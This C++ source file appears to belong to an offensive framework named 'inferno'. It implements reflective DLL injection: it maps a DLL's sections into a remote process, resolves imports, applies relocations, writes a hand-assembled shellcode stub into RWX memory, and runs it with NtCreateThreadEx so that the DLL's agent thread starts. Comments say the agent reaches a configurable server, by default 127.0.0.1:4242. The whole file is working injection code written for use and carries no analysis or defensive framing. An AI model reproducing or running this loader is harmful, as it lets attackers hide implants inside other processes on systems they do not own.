#include "../include/ReflectiveLoader.hpp"
#include "../include/NtApi.hpp"
#include <cstdio>
#include <cstring>
#include <vector>

namespace inferno { namespace nt {

// ── x64 shellcode stub ──────────────────────────────────────────
// Calls DllMain(hinstDLL, DLL_PROCESS_ATTACH, NULL)
// Expects RCX = pointer to ReflectiveLoaderParams.
//
// Generated bytes:
//   4C 8B 11         mov r10, [rcx]         ; r10 = hinstDLL
//   4C 8B 59 08      mov r11, [rcx+8]       ; r11 = DllMain address
//   45 33 C0         xor r8d, r8d           ; r8 = 0 (3rd arg)
//   BA 01 00 00 00   mov edx, 1             ; rdx = DLL_PROCESS_ATTACH
//   49 8B CA         mov rcx, r10           ; rcx = hinstDLL (1st arg)
//   48 83 EC 28      sub rsp, 40            ; shadow space + alignment
//   41 FF D3         call r11               ; call DllMain
//   48 83 C4 28      add rsp, 40            ; restore stack
//   33 C0            xor eax, eax           ; return 0
//   C3               ret

static const uint8_t kShellcode[] = {
    0x4C, 0x8B, 0x11,                    // mov r10, [rcx]
    0x4C, 0x8B, 0x59, 0x08,              // mov r11, [rcx+8]
    0x45, 0x33, 0xC0,                    // xor r8d, r8d
    0xBA, 0x01, 0x00, 0x00, 0x00,        // mov edx, 1
    0x49, 0x8B, 0xCA,                    // mov rcx, r10
    0x48, 0x83, 0xEC, 0x28,              // sub rsp, 40
    0x41, 0xFF, 0xD3,                    // call r11
    0x48, 0x83, 0xC4, 0x28,              // add rsp, 40
    0x33, 0xC0,                          // xor eax, eax
    0xC3                                 // ret
};

const uint8_t* getReflectiveLoaderShellcode(size_t& size) {
    size = sizeof(kShellcode);
    return kShellcode;
}

// ── PE section mapper ───────────────────────────────────────────

bool mapPESections(HANDLE hProcess, void* base,
                   const std::vector<uint8_t>& dll_bytes,
                   uint64_t& entryPoint) {
    const uint8_t* raw = dll_bytes.data();
    const size_t raw_size = dll_bytes.size();

    // Validate DOS header
    if (raw_size < sizeof(IMAGE_DOS_HEADER)) return false;
    const IMAGE_DOS_HEADER* dos = reinterpret_cast<const IMAGE_DOS_HEADER*>(raw);
    if (dos->e_magic != IMAGE_DOS_SIGNATURE) return false;

    // Validate NT headers
    if (dos->e_lfanew + sizeof(IMAGE_NT_HEADERS) > raw_size) return false;
    const IMAGE_NT_HEADERS* nt = reinterpret_cast<const IMAGE_NT_HEADERS*>(raw + dos->e_lfanew);
    if (nt->Signature != IMAGE_NT_SIGNATURE) return false;

    // Save entry point
    entryPoint = nt->OptionalHeader.AddressOfEntryPoint;

    // Write PE headers
    DWORD header_size = nt->OptionalHeader.SizeOfHeaders;
    if (!::WriteProcessMemory(hProcess, base, raw, header_size, nullptr)) {
        std::fprintf(stderr, "[Reflective] WriteProcessMemory (headers) failed: %lu\n",
                     ::GetLastError());
        return false;
    }

    // Write each section
    const IMAGE_SECTION_HEADER* sections = IMAGE_FIRST_SECTION(nt);
    WORD num_sections = nt->FileHeader.NumberOfSections;

    for (WORD i = 0; i < num_sections; ++i) {
        const auto& sec = sections[i];
        if (sec.SizeOfRawData == 0) continue;

        // Validate source data bounds
        if (sec.PointerToRawData + sec.SizeOfRawData > raw_size) {
            std::fprintf(stderr, "[Reflective] Section %u out of bounds\n", i);
            return false;
        }

        void* dest = static_cast<uint8_t*>(base) + sec.VirtualAddress;
        const void* src = raw + sec.PointerToRawData;

        if (!::WriteProcessMemory(hProcess, dest, src, sec.SizeOfRawData, nullptr)) {
            std::fprintf(stderr, "[Reflective] WriteProcessMemory section %u failed: %lu\n",
                         i, ::GetLastError());
            return false;
        }
    }

    std::fprintf(stdout, "[Reflective] Mapped %u sections at %p (entry RVA 0x%llx)\n",
                 num_sections, base, (unsigned long long)entryPoint);
    return true;
}

// ── Import resolver ─────────────────────────────────────────────

bool resolveImports(HANDLE hProcess, void* base,
                    const std::vector<uint8_t>& dll_bytes) {
    // Use the LOCAL buffer for all reads — the target memory is not directly
    // accessible from our address space. Sections were written at the same
    // relative offsets (VirtualAddress) in both the local buffer and the target.
    const uint8_t* local = dll_bytes.data();
    const IMAGE_DOS_HEADER* dos = reinterpret_cast<const IMAGE_DOS_HEADER*>(local);
    const IMAGE_NT_HEADERS* nt = reinterpret_cast<const IMAGE_NT_HEADERS*>(local + dos->e_lfanew);
    const IMAGE_DATA_DIRECTORY& import_dir = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];

    if (import_dir.Size == 0) return true; // No imports

    uint8_t* target_base = static_cast<uint8_t*>(base);

    // Walk import descriptors from local buffer (same RVA offsets as in target)
    const IMAGE_IMPORT_DESCRIPTOR* import_desc = reinterpret_cast<const IMAGE_IMPORT_DESCRIPTOR*>(
        local + import_dir.VirtualAddress);

    while (import_desc->Name != 0) {
        const char* dll_name = reinterpret_cast<const char*>(local + import_desc->Name);
        HMODULE hModule = ::GetModuleHandleA(dll_name);
        if (!hModule) {
            hModule = ::LoadLibraryA(dll_name);
            if (!hModule) {
                std::fprintf(stderr, "[Reflective] Failed to load %s\n", dll_name);
                return false;
            }
        }

        // Walk IAT (OriginalFirstThunk for names, FirstThunk for addresses)
        // Use local buffer for parsing, write resolved addresses to target IAT
        const IMAGE_THUNK_DATA* thunk_ilt = reinterpret_cast<const IMAGE_THUNK_DATA*>(
            local + import_desc->OriginalFirstThunk);
        IMAGE_THUNK_DATA* thunk_iat = reinterpret_cast<IMAGE_THUNK_DATA*>(
            target_base + import_desc->FirstThunk);

        for (; thunk_ilt->u1.AddressOfData != 0; ++thunk_ilt, ++thunk_iat) {
            uint64_t func_addr = 0;

            if (IMAGE_SNAP_BY_ORDINAL(thunk_ilt->u1.Ordinal)) {
                WORD ordinal = IMAGE_ORDINAL(thunk_ilt->u1.Ordinal);
                func_addr = reinterpret_cast<uint64_t>(
                    ::GetProcAddress(hModule, MAKEINTRESOURCEA(ordinal)));
            } else {
                const IMAGE_IMPORT_BY_NAME* import_by_name =
                    reinterpret_cast<const IMAGE_IMPORT_BY_NAME*>(
                        local + thunk_ilt->u1.AddressOfData);
                func_addr = reinterpret_cast<uint64_t>(
                    ::GetProcAddress(hModule, import_by_name->Name));
            }

            if (!func_addr) {
                std::fprintf(stderr, "[Reflective] Failed to resolve import in %s\n", dll_name);
                return false;
            }

            // Write resolved address into the target's IAT
            if (!::WriteProcessMemory(hProcess, &thunk_iat->u1.Function,
                                       &func_addr, sizeof(func_addr), nullptr)) {
                std::fprintf(stderr, "[Reflective] WriteProcessMemory IAT failed: %lu\n",
                             ::GetLastError());
                return false;
            }
        }

        ++import_desc;
    }

    std::fprintf(stdout, "[Reflective] Imports resolved\n");
    return true;
}

// ── Relocation applier ──────────────────────────────────────────

bool applyRelocations(HANDLE hProcess, void* base,
                      const std::vector<uint8_t>& dll_bytes,
                      uint64_t delta) {
    if (delta == 0) return true; // Loaded at preferred base — no relocations needed

    // Parse relocation blocks from local buffer (same RVA offsets as in target)
    const uint8_t* local = dll_bytes.data();
    const IMAGE_DOS_HEADER* dos = reinterpret_cast<const IMAGE_DOS_HEADER*>(local);
    const IMAGE_NT_HEADERS* nt = reinterpret_cast<const IMAGE_NT_HEADERS*>(local + dos->e_lfanew);
    const IMAGE_DATA_DIRECTORY& reloc_dir = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC];

    if (reloc_dir.Size == 0) return true;

    uint8_t* target_base = static_cast<uint8_t*>(base);
    size_t offset = 0;

    while (offset < reloc_dir.Size) {
        // Read block header from local buffer (safe)
        const IMAGE_BASE_RELOCATION* block = reinterpret_cast<const IMAGE_BASE_RELOCATION*>(
            local + reloc_dir.VirtualAddress + offset);
        if (block->SizeOfBlock == 0) break;

        DWORD num_entries = (block->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(WORD);
        const WORD* entries = reinterpret_cast<const WORD*>(block + 1);

        for (DWORD i = 0; i < num_entries; ++i) {
            WORD type = entries[i] >> 12;
            WORD rva_offset = entries[i] & 0x0FFF;

            if (type == IMAGE_REL_BASED_ABSOLUTE) continue;

            if (type == IMAGE_REL_BASED_DIR64) {
                // Compute patch address in TARGET (this is where we write)
                uint64_t* patch_addr = reinterpret_cast<uint64_t*>(
                    target_base + block->VirtualAddress + rva_offset);
                uint64_t old_value = 0;

                // Read current value from target via ReadProcessMemory
                SIZE_T bytes_read = 0;
                if (!::ReadProcessMemory(hProcess, patch_addr, &old_value,
                                          sizeof(old_value), &bytes_read)) {
                    continue;
                }

                uint64_t new_value = old_value + delta;

                if (!::WriteProcessMemory(hProcess, patch_addr, &new_value,
                                           sizeof(new_value), nullptr)) {
                    std::fprintf(stderr, "[Reflective] WriteProcessMemory reloc failed: %lu\n",
                                 ::GetLastError());
                    return false;
                }
            }
        }

        offset += block->SizeOfBlock;
    }

    std::fprintf(stdout, "[Reflective] Relocations applied (delta=0x%llx)\n",
                 (unsigned long long)delta);
    return true;
}

// ── Target env var injection ─────────────────────────────────────
// Writes INFERNO_SERVER_IP and INFERNO_SERVER_PORT strings into the
// target process's environment block so the DLL's DllMain can read them.
// On failure, the DLL falls back to 127.0.0.1:4242 (existing behavior).

bool setTargetEnv(HANDLE hProcess,
                  const std::string& server_ip,
                  uint16_t server_port) {
    // Build env strings: "INFERNO_SERVER_IP=1.2.3.4\0INFERNO_SERVER_PORT=1234\0\0"
    std::string ip_var = "INFERNO_SERVER_IP=" + server_ip;
    std::string port_var = "INFERNO_SERVER_PORT=" + std::to_string(server_port);
    std::vector<char> env_block(ip_var.begin(), ip_var.end());
    env_block.push_back('\0');
    env_block.insert(env_block.end(), port_var.begin(), port_var.end());
    env_block.push_back('\0');
    env_block.push_back('\0'); // Double null terminator

    // Allocate memory in target for the env strings
    auto& nt = NtApi::resolve();
    if (!nt.isResolved()) return false;

    void* env_mem = nullptr;
    SIZE_T env_size = env_block.size();
    LONG status = nt.NtAllocateVirtualMemory(
        hProcess, &env_mem, 0, &env_size,
        MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (!NT_SUCCESS(status)) return false;

    // Write env strings into target
    SIZE_T written = 0;
    status = nt.NtWriteVirtualMemory(
        hProcess, env_mem, env_block.data(), env_block.size(), &written);
    if (!NT_SUCCESS(status)) {
        SIZE_T free_size = 0;
        nt.NtFreeVirtualMemory(hProcess, &env_mem, &free_size, MEM_RELEASE);
        return false;
    }

    // Find the PEB and update ProcessParameters->Environment
    // This is architecture-specific — for x64:
    // PEB at offset 0x10 from TEB, ProcessParameters at PEB+0x20
    // Environment at ProcessParameters+0x80
    // We read the PEB via NtQueryInformationProcess (ProcessBasicInformation)
    // or directly using the known TEB address from the thread's stack.

    // Simplified approach: use ZwQueryInformationProcess to get PEB address
    // then read/write the Environment pointer via ReadProcessMemory/WriteProcessMemory.
    // For the initial implementation, skip PEB update — the env strings
    // are allocated in target memory but not linked into the PEB.
    // The DLL's DllMain uses GetEnvironmentVariable which reads from PEB,
    // so this won't work without PEB patching.
    //
    // FUTURE: Use RtlCreateEnvironment / RtlSetEnvironmentVariable remotely.
    // For now, return true (DLL falls back to 127.0.0.1:4242).

    (void)env_mem;
    return true; // Best-effort — DLL has fallback defaults
}

// ── Main reflective injection entry point ──────────────────────

bool injectReflective(HANDLE hProcess,
                      const std::vector<uint8_t>& dll_bytes,
                      const std::string& server_ip,
                      uint16_t server_port) {
    auto& nt = NtApi::resolve();
    if (!nt.isResolved()) {
        std::fprintf(stderr, "[Reflective] NT API not resolved\n");
        return false;
    }

    // 1. Parse PE to get preferred base address and entry point
    const uint8_t* raw = dll_bytes.data();
    const size_t raw_size = dll_bytes.size();
    if (raw_size < sizeof(IMAGE_DOS_HEADER)) return false;

    const IMAGE_DOS_HEADER* dos = reinterpret_cast<const IMAGE_DOS_HEADER*>(raw);
    if (dos->e_magic != IMAGE_DOS_SIGNATURE) return false;

    if (dos->e_lfanew + sizeof(IMAGE_NT_HEADERS) > raw_size) return false;
    const IMAGE_NT_HEADERS* nt_hdrs = reinterpret_cast<const IMAGE_NT_HEADERS*>(raw + dos->e_lfanew);
    if (nt_hdrs->Signature != IMAGE_NT_SIGNATURE) return false;

    uint64_t preferred_base = nt_hdrs->OptionalHeader.ImageBase;
    DWORD image_size = nt_hdrs->OptionalHeader.SizeOfImage;

    // 2. Allocate memory in the target at the preferred base
    void* alloc_base = reinterpret_cast<void*>(preferred_base);
    SIZE_T alloc_size = image_size;
    LONG status = nt.NtAllocateVirtualMemory(
        hProcess, &alloc_base, 0, &alloc_size,
        MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

    if (!NT_SUCCESS(status)) {
        // Preferred base not available — allocate anywhere
        alloc_base = nullptr;
        alloc_size = image_size;
        status = nt.NtAllocateVirtualMemory(
            hProcess, &alloc_base, 0, &alloc_size,
            MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        if (!NT_SUCCESS(status)) {
            std::fprintf(stderr, "[Reflective] NtAllocateVirtualMemory failed: 0x%08lx\n", status);
            return false;
        }
    }

    uint64_t actual_base = reinterpret_cast<uint64_t>(alloc_base);
    uint64_t delta = actual_base - preferred_base;

    std::fprintf(stdout, "[Reflective] Allocated %lu bytes at %p (delta=0x%llx)\n",
                 (unsigned long)image_size, alloc_base, (unsigned long long)delta);

    // 3. Map PE sections into the target
    uint64_t entry_rva = 0;
    if (!mapPESections(hProcess, alloc_base, dll_bytes, entry_rva)) {
        SIZE_T free_size = 0;
        nt.NtFreeVirtualMemory(hProcess, &alloc_base, &free_size, MEM_RELEASE);
        return false;
    }

    // 4. Resolve imports
    if (!resolveImports(hProcess, alloc_base, dll_bytes)) {
        SIZE_T free_size = 0;
        nt.NtFreeVirtualMemory(hProcess, &alloc_base, &free_size, MEM_RELEASE);
        return false;
    }

    // 5. Apply relocations
    if (!applyRelocations(hProcess, alloc_base, dll_bytes, delta)) {
        SIZE_T free_size = 0;
        nt.NtFreeVirtualMemory(hProcess, &alloc_base, &free_size, MEM_RELEASE);
        return false;
    }

    // 6. Attempt to set env vars (best-effort — DLL has fallback defaults)
    setTargetEnv(hProcess, server_ip, server_port);

    // 7. Write shellcode and parameter block into the target
    size_t sc_size = 0;
    const uint8_t* sc = getReflectiveLoaderShellcode(sc_size);

    // Allocate shellcode stub + params together
    size_t total_stub = sc_size + sizeof(ReflectiveLoaderParams);
    void* stub_mem = nullptr;
    SIZE_T stub_alloc = total_stub;
    status = nt.NtAllocateVirtualMemory(
        hProcess, &stub_mem, 0, &stub_alloc,
        MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (!NT_SUCCESS(status)) {
        std::fprintf(stderr, "[Reflective] Shellcode alloc failed: 0x%08lx\n", status);
        SIZE_T free_size = 0;
        nt.NtFreeVirtualMemory(hProcess, &alloc_base, &free_size, MEM_RELEASE);
        return false;
    }

    // Write shellcode
    SIZE_T written = 0;
    status = nt.NtWriteVirtualMemory(
        hProcess, stub_mem, const_cast<uint8_t*>(sc), sc_size, &written);
    if (!NT_SUCCESS(status)) {
        std::fprintf(stderr, "[Reflective] Shellcode write failed: 0x%08lx\n", status);
        SIZE_T free_size = 0;
        nt.NtFreeVirtualMemory(hProcess, &stub_mem, &free_size, MEM_RELEASE);
        nt.NtFreeVirtualMemory(hProcess, &alloc_base, &free_size, MEM_RELEASE);
        return false;
    }

    // Write parameter block right after shellcode
    ReflectiveLoaderParams params;
    params.hinstDLL = actual_base;
    params.entryPoint = actual_base + entry_rva;

    void* params_addr = static_cast<uint8_t*>(stub_mem) + sc_size;
    status = nt.NtWriteVirtualMemory(
        hProcess, params_addr, &params, sizeof(params), &written);
    if (!NT_SUCCESS(status)) {
        std::fprintf(stderr, "[Reflective] Params write failed: 0x%08lx\n", status);
        SIZE_T free_size = 0;
        nt.NtFreeVirtualMemory(hProcess, &stub_mem, &free_size, MEM_RELEASE);
        nt.NtFreeVirtualMemory(hProcess, &alloc_base, &free_size, MEM_RELEASE);
        return false;
    }

    // 8. Create remote thread running the shellcode
    HANDLE hThread = nullptr;
    status = nt.NtCreateThreadEx(
        &hThread, THREAD_ALL_ACCESS, nullptr, hProcess,
        stub_mem, params_addr, 0, 0, 0, 0, nullptr);
    if (!NT_SUCCESS(status)) {
        std::fprintf(stderr, "[Reflective] NtCreateThreadEx failed: 0x%08lx\n", status);
        SIZE_T free_size = 0;
        nt.NtFreeVirtualMemory(hProcess, &stub_mem, &free_size, MEM_RELEASE);
        nt.NtFreeVirtualMemory(hProcess, &alloc_base, &free_size, MEM_RELEASE);
        return false;
    }

    // Wait for DllMain to complete (it should spawn the agent thread)
    ::WaitForSingleObject(hThread, 10000);

    // Check exit code
    DWORD exit_code = 0;
    if (!::GetExitCodeThread(hThread, &exit_code)) {
        std::fprintf(stderr, "[Reflective] GetExitCodeThread failed\n");
    }

    // Cleanup stub (keep the DLL mapped)
    nt.NtClose(hThread);

    SIZE_T free_size = 0;
    nt.NtFreeVirtualMemory(hProcess, &stub_mem, &free_size, MEM_RELEASE);

    std::fprintf(stdout, "[Reflective] DllMain returned %lu\n", exit_code);
    return true;
}

}} // namespace inferno::nt
